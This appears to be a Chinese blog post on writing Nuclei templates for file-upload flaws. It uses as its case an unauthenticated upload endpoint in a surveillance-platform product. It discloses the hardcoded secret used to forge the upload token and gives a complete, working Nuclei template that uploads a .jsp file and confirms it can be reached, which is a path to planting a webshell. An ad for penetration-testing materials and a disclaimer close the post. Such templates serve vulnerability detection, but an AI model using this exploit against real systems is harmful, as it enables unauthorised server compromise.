前言
Nuclei对于文件上传类型Poc编写小Tips
平台
ProjectDiscovery Cloud Platform:
https://cloud.projectdiscovery.io/
JsonPath:
https://jsonpath.com/
Json解析:
在线json解析平台即可
案例
某康resourceOperations upload接口存在前台上传
具体接口:
POST /eps/api/resourceOperations/upload?token=xxx HTTP/1.1
分析
token为 32位MD5大写,即
MD5(https://target.com/eps/api/resourceOperations/uploadsecretKeyIbuilding)转大写
Resp返回path如下:
{"success":true,"message":"上传附件成功","data":{"uuid":null,"resourceUuid":"9abf316d58xxxxx25460b9358c91","resourceType":9998,"operationType":999,"extAttrs":"{\"fileName\":\"1.jsp\",\"fileSize\":\"0.00KB\"}","pUuid":null,"isOn":null,"resourceName":"1.jsp","resourceSize":"0.00KB","unitName":null,"regionName":null}}
完整path:https://target.com/eps/upload/resourceUuid值.jsp
Nuclei for Poc
variables:
boundary: "{{rand_base(20)}}"
Token: '{{to_upper("{{md5("https://{{Hostname}}/eps/api/resourceOperations/uploadsecretKeyIbuilding")}}")}}'
path提取
demo:
http:
- raw:
- |-
POST /eps/api/resourceOperations/upload?token={{Token}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988
Content-Type: multipart/form-data;boundary={{boundary}}
Upgrade-Insecure-Requests: 1
Content-Length: 174
--{{boundary}}
Content-Disposition: form-data; name="fileUploader";filename="1.jsp"
Content-Type: image/jpeg
123456
--{{boundary}}
- |-
GET /eps/upload/{{plt}}.jsp HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
part: body
name: plt
internal: true
json:
- '.data.resourceUuid'
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains_all(body_2,"123456") && status_code==200更多网络安全优质免费学习资料与干货教程+
送渗透工具、技术文档、书籍,面试题、视频(基础到进阶。环境搭建,HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等)、应急响应笔记、学习路线。
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
